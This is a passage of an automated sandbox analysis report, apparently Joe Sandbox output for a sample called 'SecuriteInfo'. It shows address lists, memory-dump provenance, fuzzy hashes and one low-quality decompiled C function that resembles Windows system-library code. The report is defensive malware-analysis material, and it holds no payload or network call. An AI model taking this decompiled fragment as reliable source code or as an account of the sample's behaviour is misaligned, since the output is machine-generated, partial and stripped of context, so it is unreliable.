                                                                            0x1d82e9ed
                                                                            0x00000000
                                                                            0x1d82e9ed
                                                                            0x1d82e9dd
                                                                            0x1d7d05b9
                                                                            0x1d7d05be
                                                                            0x1d7d05c7
                                                                            0x1d82e9f2
                                                                            0x1d82e9f2
                                                                            0x1d7d05c7
                                                                            0x00000000
                                                                            0x1d7d05ad
                                                                            0x00000000
                                                                            0x1d82e9b2
                                                                            0x1d7d050c
                                                                            0x1d7d04fb
                                                                            0x1d82e989
                                                                            0x1d82e990
                                                                            0x00000000
                                                                            0x1d82e990
                                                                            0x00000000
                                                                            0x1d7d04fb
                                                                            0x1d7d04dc
                                                                            0x1d7d04e2
                                                                            0x1d7d05d6
                                                                            0x1d7d05dc
                                                                            0x1d7d04e8
                                                                            0x1d7d04e8
                                                                            0x1d7d04e8
                                                                            0x1d7d04ed
                                                                            0x00000000

                                                                            APIs
                                                                            Strings
                                                                            • kLsE, xrefs: 1D7D05FE
                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1D7D0586
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                            • API String ID: 3446177414-2547482624
                                                                            • Opcode ID: 1f4beb6ec2759cf92b31748bfe99d271288cc76e8e2919ffb8df4477bf9de889
                                                                            • Instruction ID: 3d8fe6405c4641e948450925d63f5ee32b424cc2187ed1fab7f15cefc90602c3
                                                                            • Opcode Fuzzy Hash: 1f4beb6ec2759cf92b31748bfe99d271288cc76e8e2919ffb8df4477bf9de889
                                                                            • Instruction Fuzzy Hash: 4F51CD75A00B56DFC792DFA5C485AAAB7F4AF44360F00943EDA9A83240E774A544CBA3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7CDF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 25%
                                                                            			E1D7CDF21(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1d8cb370 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1D818F40( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							L1D7E2330(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1D7E24D0(_t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1d8c91e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1D814B50(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                                                            0x1d7cdf21
                                                                            0x1d7cdf29
                                                                            0x1d7cdf33
                                                                            0x1d7cdf3b
                                                                            0x1d7cdf40
                                                                            0x1d7cdf44
                                                                            0x1d7cdf46
                                                                            0x1d7cdf52
                                                                            0x1d7cdf56
                                                                            0x1d7cdf5b
                                                                            0x1d7cdf5e
                                                                            0x1d7cdf61
                                                                            0x1d7cdf65
                                                                            0x1d7cdf67
                                                                            0x1d7ce058
                                                                            0x1d7ce05a
                                                                            0x1d7ce05d
                                                                            0x00000000
                                                                            0x1d7cdf6d
                                                                            0x1d7cdf6d
                                                                            0x1d7cdf70
                                                                            0x1d82d6ea
                                                                            0x1d82d6f3
                                                                            0x00000000
                                                                            0x1d82d6ec
                                                                            0x1d82d6ec
                                                                            0x1d82d6ec
                                                                            0x1d7cdf76
                                                                            0x1d7cdf76
                                                                            0x1d7cdf78
                                                                            0x1d7cdf78
                                                                            0x1d7cdf79
                                                                            0x1d7cdf80
                                                                            0x1d7ce019
                                                                            0x1d7ce024
                                                                            0x1d7ce02c
                                                                            0x1d7ce032
                                                                            0x1d7ce03b
                                                                            0x1d7ce045
                                                                            0x1d7ce04b
                                                                            0x1d7ce04e
                                                                            0x1d7ce04e
                                                                            0x1d7cdf8d
                                                                            0x1d7cdf91
                                                                            0x1d7cdf94
                                                                            0x1d7cdf99
                                                                            0x1d7cdfa0
                                                                            0x1d7cdfab
                                                                            0x1d7cdfb3
                                                                            0x1d7cdfb7
                                                                            0x1d7cdfbb
                                                                            0x1d7cdfbc
                                                                            0x1d7cdfc0
                                                                            0x1d7cdfc8
                                                                            0x1d7cdfc9
                                                                            0x1d7cdfca
                                                                            0x1d7cdfcd
                                                                            0x1d7cdfe0
                                                                            0x1d7cdfea
                                                                            0x1d7cdfea
                                                                            0x1d7cdfec
                                                                            0x1d7cdfec
                                                                            0x1d7cdf70
                                                                            0x1d7cdff2
                                                                            0x1d7cdff3
                                                                            0x1d7cdff4
                                                                            0x1d7cdfff

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: 0$0
                                                                            • API String ID: 3446177414-203156872
                                                                            • Opcode ID: 417d6785102dab058d8805870b9524fa48a8a5bd5ee7db332e0ddb2efc775c1a
                                                                            • Instruction ID: 046575b892da7dd237c71d30421070ca1e84f9b997c7e9b21b1efb3b3dbd7879
                                                                            • Opcode Fuzzy Hash: 417d6785102dab058d8805870b9524fa48a8a5bd5ee7db332e0ddb2efc775c1a
                                                                            • Instruction Fuzzy Hash: 3D4169B16087429FC301CF2CC484A5ABBE4BB89724F044A6EF588DB340D771EA05CB86
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%